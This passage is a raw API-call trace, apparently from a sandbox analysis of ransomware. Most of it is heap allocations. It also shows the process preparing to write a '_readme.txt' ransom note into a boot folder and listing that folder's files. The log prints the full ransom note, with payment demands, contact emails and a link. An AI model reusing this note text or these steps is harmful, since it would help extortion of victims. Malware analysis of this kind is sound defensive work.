lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.576] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0228.577] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.577] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.577] PathFindFileNameW (pszPath="") returned="" [0228.577] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.577] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.577] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.577] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.577] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0228.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.578] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0228.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.578] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.578] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.578] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.578] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.579] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.579] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.579] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.579] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.579] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.583] RtlAllocateHeap 